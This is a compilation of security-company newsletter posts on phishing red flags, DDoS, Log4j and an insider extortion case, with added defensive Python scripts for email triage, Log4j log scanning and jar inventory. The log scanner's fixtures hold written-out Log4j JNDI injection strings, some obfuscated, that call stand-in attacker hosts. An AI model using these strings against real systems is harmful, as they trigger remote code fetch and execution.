• Overview

    • Phish Tale of the Week
    • Microsoft Fends off Largest DDoS Attack Ever Recorded
    • Threat Actors Target Tax Software Company Intuit in Latest Phishing Campaign
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts often target specific groups that malicious actors believe they can exploit. In this instance, we see a phishing scam aimed at people of college age: the email offers grant money to go back to school and arrives with an encrypted PDF attached. The offer sounds generous and the attachment looks official, so why not open it? Unfortunately, there are plenty of reasons not to.

    Take a look below:

    1. The first red flag on this email is the sender address. Always inspect the sender address thoroughly to confirm it belongs to the organization the message claims to be from. Look at the full address, not just the display name, and compare it with previous legitimate correspondence from that organization.
    2. The second warning sign is the blunt pitch about grant money. Messages like this target people in college or of college age with an offer that is too good to be true. In this case, we are told we can take the right path in life by accepting these grant funds to go back to school.
    3. The final warning sign is the encrypted PDF attached to the message. Threat actors favor password-protected or encrypted PDFs because mail gateways and antivirus engines cannot inspect their contents, so a malicious payload (often a downloader for ransomware or other malware) passes through unscanned. Never open attachments from unknown parties.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does the order number match one you already have? Did the email come from a store you don’t usually order from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message. Check the full sender address, not just the display name.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers or a social security number? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct domain for the company/service. HTTPS only means the connection is encrypted; phishing sites use it too, so a padlock alone proves nothing about who owns the site.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
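    As an added example, not code from Netizen or from any mail vendor, here is a small Python triage script that applies the sender and link checks above to a constructed sample message. The FedEx branding and the mail-promo-tracker.example and delivery-update.example domains are made up for the example. The script compares the visible From domain with the envelope sender, reads the receiving server's SPF, DKIM and DMARC verdicts from the Authentication-Results header, and judges each link by its registrable domain rather than by whether it uses HTTPS.

```python
"""Triage one suspicious email: does the visible sender match the envelope
sender and the authentication verdicts, and where do its links really go?"""
from __future__ import annotations

import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample, not a real message: branded as FedEx, visible From
# spoofed to fedex.com, envelope sender and link on unrelated domains.
SAMPLE_EMAIL = """\
Return-Path: <bounce@mail-promo-tracker.example>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mail-promo-tracker.example; dkim=none; dmarc=fail header.from=fedex.com
From: FedEx Delivery <noreply@fedex.com>
To: customer@example.net
Subject: Your package could not be delivered
Content-Type: text/plain; charset=utf-8

Your package could not be delivered because your physical address is incomplete.
Update my address: https://fedex.com.delivery-update.example/track?id=123
Need help? http://www.fedex.com/
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registered_domain(host: str) -> str:
    """Crude 'last two labels' registrable domain. Adequate for .com-style
    names; a production tool should consult the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def domain_of(header_value: str) -> str:
    """Domain part of the address in a From/Return-Path header."""
    _, addr = parseaddr(header_value)
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def triage_email(raw: str, expected_domain: str) -> list[str]:
    """Return the red flags found; an empty list means nothing obvious."""
    msg = message_from_string(raw)
    flags: list[str] = []

    from_dom = domain_of(msg.get("From", ""))
    if registered_domain(from_dom) != expected_domain:
        flags.append(f"From address domain is {from_dom!r}, not {expected_domain}")

    # Return-Path is the envelope sender the sending server actually used.
    ret_dom = domain_of(msg.get("Return-Path", ""))
    if ret_dom and registered_domain(ret_dom) != registered_domain(from_dom):
        flags.append(f"Return-Path domain {ret_dom!r} differs from From domain {from_dom!r}")

    # SPF/DKIM/DMARC verdicts recorded by the receiving mail server.
    auth = msg.get("Authentication-Results", "")
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        verdict = m.group(1) if m else "missing"
        if verdict != "pass":
            flags.append(f"{mech} verdict: {verdict}")

    # Links: judge by registrable domain, not by the presence of https.
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        if registered_domain(host) != expected_domain:
            flags.append(f"link points to {host!r}, not {expected_domain}")
        elif not url.lower().startswith("https://"):
            flags.append(f"link to {host!r} is plain http")
    return flags


if __name__ == "__main__":
    for flag in triage_email(SAMPLE_EMAIL, "fedex.com"):
        print("RED FLAG:", flag)
```

    On the sample, triage_email(SAMPLE_EMAIL, "fedex.com") returns five flags: the envelope sender and From domains disagree, DKIM is absent and DMARC fails, the "update my address" link lands on delivery-update.example despite the fedex.com prefix in its hostname, and the one link that really points at fedex.com uses plain http. The lookalike link uses HTTPS and would show a padlock, which is exactly why the check keys on the domain. The registered_domain helper takes the last two labels of a hostname; for country-code domains such as .co.uk a real tool should use the Public Suffix List.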

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Microsoft Fends off Largest DDoS Attack Ever Recorded

    Cyber-attacks have ballooned to numbers the United States has never seen before in recent months. The FBI estimates that in 2020 U.S. based companies suffered over $5 billion in damages from cyber-attacks. One of the crudest and most widely used methods is the distributed denial of service (DDoS) attack. An attacker floods a system or server with more traffic than it can handle, usually from many compromised systems at once, in an effort to overwhelm the target. If done as intended, this attack can knock websites offline for hours, if not days, and cause outages for other systems that share the same infrastructure.

    Last week Microsoft’s Azure DDoS Protection team reported that in November 2021 it had successfully defended against what is likely the largest distributed denial of service attack ever recorded. The attack lasted over 15 minutes, with a throughput of 3.47 Tbps and a packet rate of 340 million packets per second (pps), and came from over 10,000 sources in ten countries across the globe.

    Microsoft is one of the most prominent technology companies globally, and attacks like this have become the new normal for the U.S.-based company. A 2.4 terabit per second (Tbps) attack in October 2021 and two other large-scale DDoS attacks of 2.5 Tbps each show just how often Microsoft’s Azure DDoS Protection team has to put its skills to the test.

    Reports from inside Microsoft show that these DDoS attacks are growing in size and duration. In 2021, 57% of DDoS attacks against Microsoft lasted under 30 minutes, a 17% drop from 2020. The share of attacks lasting longer than an hour doubled, from 13% in 2020 to 27% in 2021. These longer attacks often consist of a sequence of short, repeated bursts.

    This rise in DDoS attacks is a growing concern for the global information security community. Attacks of this kind can take down the network-facing systems that power and utility providers, transit operators in major cities and other critical services depend on. Policymakers and boards of directors alike need to prioritize bolstering their security postures. Attacks arrive with little or no notice, and a target has only moments to react. Proactive security policies and firewall rules that adapt to traffic conditions help, but an attack measured in terabits per second cannot be absorbed at an on-premises firewall; defending against one requires upstream scrubbing from an ISP or a cloud DDoS protection service with enough bandwidth to soak it up.

    To read more about this article, click here.

    Threat Actors Target Tax Software Company Intuit in Latest Phishing Campaign

    Eager to get your tax refund this year? Unfortunately, so are cyber criminals. Tax software company Intuit is warning customers that an ongoing phishing campaign is targeting its users. The subject line reads “Critical: Action Required (TXPO99497)”, and the email displays an “account disabled” warning stating that users must remedy the issue within 24 hours. Users are then told that “this is the result of a recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season.” The message concludes with a malicious link for users to “restore their accounts”.

    A spokesperson for Intuit declared, “the sender is not associated with Intuit, is not an authorized agent of Intuit, nor is their use of Intuit’s brands authorized by Intuit.”

    Intuit declined to comment on what happens when users click the malicious link, but most phishing campaigns use such links either to harvest credentials on a fake login page or to deliver malware. If you have already clicked the link, take the following steps: delete any recent downloads from unknown sources, run a scan with up-to-date antivirus software, and change the passwords of any accounts that were signed in when you clicked the link, starting with the Intuit account itself if you entered credentials on the page. Enable multi-factor authentication wherever it is offered.

    Consumers need to be constantly on the lookout for phishing attacks as threat actors become more crafty. This campaign using Intuit as a guise relies on users rushing to get their taxes done during a busy time of year. Always check the sender address and contents of every email you receive to make sure it’s not a phishing trap. Attackers often use urgent messages such as “fix account within 24 hours” or “click the link immediately to resolve this issue” to create panic and elicit a fast response from their targets. Thoroughly inspect any suspicious-looking emails, report them through your email provider’s phishing-report option, and delete them.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Overview

    • Phish Tale of the Week
    • How Remote Work has Impacted Cybersecurity
    • Are Medical Devices at Risk of Cyber Attacks?
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting FedEx customers. This email appears to be a notification alerting us that our package could not be delivered due to incomplete information for our physical address. We are then prompted to update our address below. This email contains FedEx’s logo and a convincing message saying update my address, so why not click the link and update details? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure it’s from a trusted sender. In the future, check all suspicious emails from companies against previous correspondence you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the incomplete greeting. The email starts off with “Dear [Name]” instead of an actual name. This is a telltale sign of a spam email. Most outside threat actors lack the basic information needed to create a legitimate-looking email. Usually, the greeting would include your specific first and last name to show who the company is communicating with.
    3. The final warning sign for this email is the inconsistency in the messaging. First we are told to update our physical address. Then we are told to update our personal address. Finally we are told to “update my address” below. Most companies use consistent messaging and refer to account changes that need to be made in the same fashion each time. This physical address vs. personal address vs. “update my address” confusion is an immediate red flag.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does the order number match one you already have? Did the email come from a store you don’t usually order from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message. Check the full sender address, not just the display name.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers or a social security number? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct domain for the company/service. HTTPS only means the connection is encrypted; phishing sites use it too, so a padlock alone proves nothing about who owns the site.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For FedEx-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    How Remote Work Has Impacted Cybersecurity

    The pandemic has forced many companies to abruptly accept work from home for the majority of their workforce as the new normal. Once bustling offices have been reduced to skeleton crews of a handful of employees or, in many cases, remain completely empty. This switch has been a blessing for some companies allowing them to reduce fixed costs such as real estate and even broadened their searches for new job candidates now that geographical limitations aren’t a factor.

    Unfortunately, some severe problems have begun to plague many organizations relying on remote work policies. Before the start of the pandemic, remote work was seldom used in most companies. This lack of experience and a rapid switch to remote work created a security nightmare for many teams. Many of these businesses lacked the infrastructural and cultural policies to adapt to remote work environments fully. Did you know only 38% of companies had a cybersecurity policy in place before the pandemic, and only a third of these businesses had policies on remote work? This created a perfect storm for cybercriminals, with cyber attacks almost quadrupling during the pandemic targeting small and medium-sized businesses, hospitals, enterprise-grade organizations, and schools alike.

    One of the leading causes of headaches for companies suffering onslaughts of cyber attacks was the lack of planning. Organizations adapted quickly to the new normal of remote work but had no cybersecurity policies in place beforehand to govern how remote devices are used and how they communicate with the corporate network. This lack of forethought also affected the tools, or lack thereof, that companies could use to monitor network traffic, manage firewalls, or detect vulnerabilities within their environment. Even companies with state-of-the-art equipment in the office were now rendered helpless and had to rely on the home network security of their employees, who were no longer behind the safety net of a well-configured corporate firewall.

    Another major issue that has affected companies everywhere is an overall lack of cybersecurity education. Most cyber attacks start with an unsuspecting employee clicking on a malicious link or downloading a file they shouldn’t have. Organizations need to be quick to adopt a culture of vigilance when discussing security with their employees. The best way to approach this is through an abundance of caution. Employees are better served asking for help when a link or attachment looks suspicious than mistakenly clicking on it. Companies that train their employees to ask questions about security and check with their IT admins first will notice an immediate decline in risk.

    Overall, remote work has brought many incentives to organizations that implement it correctly. With it, outside threat actors will use this increased attack surface to target more companies and employees to extort. The best way to move forward is to review your cybersecurity policies and update them accordingly for a remote work environment. Make all employees involved in a culture of security at your company.

    To read more about this article, click here.

    Are Medical Devices at Risk of Cyber Attacks?

    In 2017 the first large-scale ransomware disruption of networked medical equipment occurred when the WannaCry worm spread into radiology systems at several hospitals. The infection forced multiple hospitals to postpone treatments, including cancer care, until they could identify and contain the source of the ransomware on their network. This example perfectly illustrates how cyber attacks can disrupt the healthcare industry and impact patient care. However, the quality of care is not the only thing disrupted during cyber attacks.

    Hospitals house some of the most comprehensive PHI (protected health information) databases globally. These records include medical history, address, age, social security numbers, and insurance details that can lead to nightmares for unsuspecting patients when in the wrong hands. Since more hospitals have become interconnected with a litany of medical devices communicating with each other over the network, securing the transfer of this information through the cloud is paramount.

    Securing networked medical equipment is imperative to providing quality health care and protecting patient information. Everything from insulin pumps to ventilators to security cameras and RFID readers must be secured to ensure hackers do not have easy entry points. The interconnectivity of devices in a hospital has created a massive attack surface for outside threat actors to exploit. IT staff need to be well trained in identifying, upgrading, and patching vulnerable systems and devices to ensure they are safe from malicious cyber criminals.

    The pandemic has caused a significant strain on health care organizations across the country. The increase in patients has caused issues for primary care providers and created a perfect storm for outside threat actors. Hackers are using the unrest created from surges of patients at hospitals to target health care networks and infect them with ransomware. Law enforcement and government agencies have been unable to stop the escalation of cyber attacks against hospitals, leaving on-site IT admins and medical device security as the last line of defense.

    In conclusion, medical device manufacturers need to focus on the security of their devices before they are released into the market. Vulnerable devices cause a wide array of problems for health care institutions and can be actively exploited by cyber criminals. At the same time, hospitals need to prioritize enabling IT staff to monitor these devices and consider what devices could become attack vectors in their environment.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Log4j: The Minecraft-found, Java-fueled nightmare.

    On December 9th, the greater information security community had its world turned upside down when a newly disclosed zero-day vulnerability was found in Log4j, Apache’s Java logging library. Within hours, every major software company was in disaster mode, trying to determine which of its products were affected and how quickly a patch could be released. Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), called it the most serious flaw she had seen in her career. Just how bad is this vulnerability?

    Why is this so bad?

    The Log4j vulnerability is tracked as CVE-2021-44228, with a CVSS severity score of 10 out of 10, the maximum. Its size and scope are unlike anything researchers have dealt with before, because it affects millions of applications across the world. Log4j is a library that Java applications use to write log messages recording what they have done. Developers pull it into new applications for all sorts of purposes; it is widely used because it is efficient and open source, which saves development cost. The flaw drew public attention earlier this December in the Minecraft community, after a player triggered remote code execution (RCE) on a friend’s Minecraft server simply by sending a crafted chat message that the server logged. The same method of compromise works against any of the millions of applications that log untrusted input through a vulnerable Log4j version.

    What does this mean?

    Imagine that a specific type of bolt used on car wheels suddenly turns out to be defective. Replacing the bolts on one car is easy, but think how hard it would be to find every car that uses that type of bolt. That is what the information security community is dealing with in Log4j. By getting a specially crafted string into any text the application logs, such as a username, a chat message, or an HTTP header, an outside threat actor can make the vulnerable Log4j instance fetch and run code from a server they control. That gives them full control of the affected system and a foothold from which to build botnets, mine cryptocurrency, or spread ransomware to other connected systems.

    This vulnerability is terrifying for so many companies because of how ubiquitous and how trivial it is. The string that triggers the lookup is only about a dozen characters long, plus the address of the attacker’s server. Attackers who would never have had the skills to pull off remote code execution against a vulnerable application now have one of the most accessible attack vectors to unpatched systems. Coupled with the widespread use of the affected open-source code, this means millions of applications are susceptible to attack from everyone from nation-state threat actors to low-skilled hackers.
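    As an added example (not code from the original page and not part of Log4j itself), the following Python script shows what a detection engineer looks for in web-server logs after a disclosure like this: the ${jndi: lookup, which attackers routinely disguise with nested lookups, ${lower:} and ${upper:}, the ${name:-default} fallback syntax, and URL encoding. The log lines are constructed for the example and use documentation IP ranges; the script normalizes each line the way Log4j’s own substitution would before matching, and pulls out the callback host so it can go on a blocklist.

```python
"""Scan log lines for Log4j JNDI lookup strings, undoing the common
obfuscations before matching, and extract the attacker's callback host."""
import re
from urllib.parse import unquote

# Innermost ${...} that contains no nested lookup.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>:[//]<host[:port]>...}, case-insensitive like Log4j itself.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*:\s*(?://)?\s*([^/\s}]+)", re.I)

# Constructed web-server log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.22 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:ldap://203.0.113.7/b}"',
    '198.51.100.23 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.8/c}"',
    '198.51.100.24 - - [10/Dec/2021:12:00:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '198.51.100.25 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:${lower:LDAP}://203.0.113.9/e}"',
]


def _resolve(m):
    """Collapse one innermost lookup the way Log4j's substitutor would."""
    inner = m.group(1)
    low = inner.lower()
    if low.startswith("jndi:"):
        return m.group(0)                      # the lookup we are hunting: keep it
    if low.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if low.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:                          # ${anything:-default} -> default
        return inner.split(":-", 1)[1]
    return m.group(0)                          # unknown lookup: leave it alone


def normalize(text, max_rounds=20):
    """URL-decode and peel nested lookups from the inside out until stable."""
    for _ in range(max_rounds):
        folded = INNERMOST.sub(_resolve, unquote(text))
        if folded == text:
            return text
        text = folded
    return text


def find_jndi_lookups(lines):
    """Return one hit per line that contains a JNDI lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI_RE.search(norm)
        if m:
            hits.append({"line": number, "scheme": m.group(1).lower(),
                         "target": m.group(2), "normalized": norm})
    return hits


def callback_hosts(hits):
    """Unique callback hosts with any :port stripped (IPv4 and hostnames only)."""
    return sorted({h["target"].rsplit(":", 1)[0] for h in hits})


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['scheme']} callback to {h['target']}")
    print("block these hosts:", callback_hosts(found))
```

    On the sample, lines 2 through 6 are flagged and line 1 is not; the obfuscated variants all collapse to a plain ${jndi:...} before the match, and callback_hosts yields the three attacker addresses. Matching only the literal string ${jndi: would miss four of the five.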

    What is the solution?

    To take advantage of a vulnerable application, an attacker only has to get the crafted string into something the application logs: a form field, a chat message, a username on a login page, or an HTTP header such as User-Agent. Phishing is one way to get there, so be sure to keep an eye out in the coming weeks for suspicious emails prompting you to click a link or open an attachment. Always authenticate the sender before replying to an email chain; if the address looks suspicious, do not reply. Another step users can take is to routinely check for updates on frequently used applications such as your web browser, mobile apps, and video games. Developers are hard at work releasing patches. Install updates promptly and watch for vendor advisories with additional directives to help secure your infrastructure. Administrators should also inventory which of their applications bundle Log4j, including copies nested inside larger application archives, and upgrade them to a fixed release.
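    For the operator side of the same problem, here is an added example (mine, not Netizen’s and not the Apache project’s) that walks a directory of Java artifacts, descends into jars nested inside fat jars, wars and ears, reads the log4j-core version from its Maven pom.properties, and reports whether the JndiLookup class is present. The fixture archives it builds in a temporary directory are constructed for the example and are not real Log4j releases. The 2.17.1 threshold is an assumption for this example; projects on the Java 7 or Java 6 branches need 2.12.4 or 2.3.2 instead.

```python
"""Inventory Log4j artifacts on disk, including jars nested inside fat jars,
wars and ears, and report the bundled log4j-core version and whether the
JndiLookup class is present."""
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS_PREFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption for this example: anything below 2.17.1 is flagged. The Java 7
# and Java 6 branches were fixed in 2.12.4 and 2.3.2; adjust if you run those.
SAFE_VERSION = (2, 17, 1)


def parse_version(pom_properties):
    """Return the version= line of a Maven pom.properties as an int tuple."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            value = line.split("=", 1)[1].strip()
            try:
                return tuple(int(p) for p in value.split("."))
            except ValueError:
                return None
    return None


def scan_zip(data, chain):
    """Scan one archive held in memory; recurse into nested archives."""
    findings, has_jndi, version = [], False, None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == JNDI_CLASS:
                has_jndi = True
            elif name.startswith(POM_PROPS_PREFIX) and name.endswith("pom.properties"):
                version = parse_version(zf.read(name).decode("utf-8", "replace"))
            elif name.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(scan_zip(zf.read(name), chain + [name]))
                except zipfile.BadZipFile:
                    pass  # not actually a zip; skip it
    if has_jndi or version is not None:
        findings.append({
            "path": " -> ".join(chain),
            "version": version,
            "jndi_lookup_present": has_jndi,
            # JndiLookup present with an unknown version is treated as vulnerable.
            "vulnerable": has_jndi and (version is None or version < SAFE_VERSION),
        })
    return findings


def scan_tree(root):
    """Walk a directory and scan every archive found under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if fname.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    data = fh.read()
                try:
                    findings.extend(scan_zip(data, [full]))
                except zipfile.BadZipFile:
                    pass
    return findings


def build_fixtures(root):
    """Constructed test archives, not real Log4j releases: a Spring-Boot-style
    fat jar bundling log4j-core 2.14.1 and a standalone log4j-core 2.17.1."""
    def fake_log4j_core(version):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS_PREFIX + "pom.properties", f"version={version}\n")
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as z:
        z.writestr("BOOT-INF/classes/com/example/Main.class", b"\xca\xfe\xba\xbe")
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", fake_log4j_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(fake_log4j_core("2.17.1"))


def demo():
    """Build the fixtures in a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixtures(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        status = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{status:10} {f['path']}  version={f['version']}")
```

    Point scan_tree at a real deployment directory instead of the fixtures. The nested 2.14.1 copy inside app.jar is what a file-name-only search misses, because the outer artifact is called app.jar; this is why the scanner opens every archive it finds rather than trusting names. Presence of JndiLookup.class in a fixed release is normal, so the version is what decides the verdict; only when no version can be read does the class alone count against the artifact.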

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Overview

    • Phish Tale of the Week
    • Ubiquiti Developer Charged With Extortion
    • IKEA Fights Ongoing Phishing Campaign
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting Amazon customers, or simply anyone who doesn’t check their email rigorously. This email appears to be a notification alerting us that Amazon is missing our address and that a package was supposed to be delivered today. The email carries Amazon’s branding and a convincing message asking us to reply with the correct shipping address, so why not click the link and update our details? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure it’s from a trusted sender. In the future, check all suspicious emails from companies against previous correspondence you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the lack of corroboration. The message says a delivery was scheduled for today, but Amazon normally fulfills its shipping orders through UPS, FedEx or USPS. While Amazon will usually alert you to a missed delivery, the lack of an additional notice from the shipping company is cause for suspicion.
    3. The final warning sign for this email is the call to action at the bottom. The message says to “update detals”. Terse messaging like this is typical of scams: the goal is to get people to skim and click as fast as possible. One easy way to spot a scam email is to compare it with previous emails you’ve received from the company. Set beside genuine correspondence from Amazon, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does the order number match one you already have? Did the email come from a store you don’t usually order from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message. Check the full sender address, not just the display name.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers or a social security number? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct domain for the company/service. HTTPS only means the connection is encrypted; phishing sites use it too, so a padlock alone proves nothing about who owns the site.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Amazon-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Ubiquiti Developer Charged With Extortion

    Following a January 2021 data breach, technology vendor Ubiquiti Inc. says it has uncovered the source of the incident. On Wednesday, federal prosecutors announced the arrest in Oregon of Nickolas Sharp, a former senior developer at Ubiquiti. Sharp stands accused of stealing gigabytes of confidential, proprietary data from his former employer and then trying to extort Ubiquiti for $1.9 million to return the files. Sharp worked at the New York-based company from August 2018 to April 2021, and after the breach he posed as an anonymous whistle-blower claiming that an outside hacker was responsible.

    Prosecutors claim Nickolas Sharp applied for a job at another tech company in December 2020. He then abused his access privileges to steal Ubiquiti data from the company’s AWS environment and its GitHub accounts. Employees inside Ubiquiti noticed unusual download activity on December 28 and found that the user had used internal company credentials over a VPN connection to mask their real location. This prompted the company to investigate the suspicious activity further.

    On January 7, a senior Ubiquiti employee received a ransom email sent from an IP address belonging to the same VPN service used to download the stolen data. The email explained that internal and external Ubiquiti data had been stolen, and the extortionist demanded 25 bitcoin in exchange for the return of the data. The sender then offered to identify a “backdoor” they had left in the Ubiquiti environment for an additional 25 bitcoin. Prosecutors say Sharp sent this ransom demand while working on the remediation team investigating the breach, which put him close to the evidence and gave him a chance to stifle efforts to uncover its source.

